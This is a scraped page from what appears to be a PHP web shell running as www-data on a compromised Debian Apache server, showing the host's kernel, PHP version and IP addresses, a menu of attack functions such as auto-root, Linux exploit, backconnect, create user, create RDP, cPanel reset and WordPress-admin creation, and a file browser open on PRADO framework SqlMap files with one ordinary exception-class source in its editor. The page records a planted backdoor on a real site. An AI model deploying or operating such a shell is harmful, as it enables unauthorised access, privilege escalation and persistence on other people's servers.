Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.88.104
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
framework /
Data /
SqlMap /
DataMapper /
[ HOME SHELL ]
Name
Size
Permission
Action
TFastSqlMapApplicationCache.ph...
1.92
KB
-rw-r--r--
TLazyLoadList.php
4.17
KB
-rw-r--r--
TPropertyAccess.php
4.14
KB
-rw-r--r--
TSqlMapCache.php
6.42
KB
-rw-r--r--
TSqlMapException.php
2.5
KB
-rw-r--r--
TSqlMapPagedList.php
5.54
KB
-rw-r--r--
TSqlMapTypeHandlerRegistry.php
4.98
KB
-rw-r--r--
messages.txt
4.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TSqlMapException.php
<?php /** * TSqlMapException is the base exception class for all SqlMap exceptions. * * @author Wei Zhuo <weizho[at]gmail[dot]com> * @package System.Data.SqlMap * @since 3.1 */ class TSqlMapException extends TException { /** * Constructor, similar to the parent constructor. For parameters that * are of SimpleXmlElement, the tag name and its attribute names and values * are expanded into a string. */ public function __construct($errorMessage) { $this->setErrorCode($errorMessage); $errorMessage=$this->translateErrorMessage($errorMessage); $args=func_get_args(); array_shift($args); $n=count($args); $tokens=array(); for($i=0;$i<$n;++$i) { if($args[$i] instanceof SimpleXmlElement) $tokens['{'.$i.'}']=$this->implodeNode($args[$i]); else $tokens['{'.$i.'}']=TPropertyValue::ensureString($args[$i]); } parent::__construct(strtr($errorMessage,$tokens)); } /** * @param SimpleXmlElement node * @return string tag name and attribute names and values. */ protected function implodeNode($node) { $attributes=array(); foreach($node->attributes() as $k=>$v) $attributes[]=$k.'="'.(string)$v.'"'; return '<'.$node->getName().' '.implode(' ',$attributes).'>'; } /** * @return string path to the error message file */ protected function getErrorMessageFile() { $lang=Prado::getPreferredLanguage(); $dir=dirname(__FILE__); $msgFile=$dir.'/messages-'.$lang.'.txt'; if(!is_file($msgFile)) $msgFile=$dir.'/messages.txt'; return $msgFile; } } /** * TSqlMapConfigurationException, raised during configuration file parsing. * * @author Wei Zhuo <weizho[at]gmail[dot]com> * @package System.Data.SqlMap * @since 3.1 */ class TSqlMapConfigurationException extends TSqlMapException { } /** * TSqlMapUndefinedException, raised when mapped statemented are undefined. * * @author Wei Zhuo <weizho[at]gmail[dot]com> * @package System.Data.SqlMap * @since 3.1 */ class TSqlMapUndefinedException extends TSqlMapException { } /** * TSqlMapDuplicateException, raised when a duplicate mapped statement is found. * * @author Wei Zhuo <weizho[at]gmail[dot]com> * @package System.Data.SqlMap * @since 3.1 */ class TSqlMapDuplicateException extends TSqlMapException { } /** * TInvalidPropertyException, raised when setting or getting an invalid property. * * @author Wei Zhuo <weizho[at]gmail[dot]com> * @package System.Data.SqlMap * @since 3.1 */ class TInvalidPropertyException extends TSqlMapException { } class TSqlMapExecutionException extends TSqlMapException { }
Close